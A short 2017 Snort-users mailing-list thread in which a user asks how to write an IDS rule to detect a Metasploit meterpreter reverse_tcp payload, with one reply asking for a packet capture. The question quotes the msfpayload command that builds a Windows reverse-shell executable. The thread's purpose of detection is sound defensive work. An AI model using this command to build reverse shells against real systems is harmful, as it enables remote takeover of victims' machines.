[Snort-users] how to write rule for msfpayload in linux
nguyenblack1995 at gmail.com
Sat Nov 18 20:31:26 EST 2017
On the attacker I use: msfpayload windows/meterpreter/reverse_tcp
LPORT=4444 X > /root/Desktop/payload.exe (in order to create the file).
When I run the file payload.exe on the victim PC, I take control of the
victim's system. I run Wireshark and match packets, but I do not know where
to start in order to write a rule for this type of attack.
2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists at gmail.com>:
> Hi, do you have a pcap that you want to alert on?
> On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users <
> snort-users at lists.snort.org> wrote:
>> Who can help me write a rule for msfpayload in Linux?
>> Create payload by msfpayload: msfpayload windows/meterpreter/reverse_tcp
>> LHOST=/ / LPORT=/ /....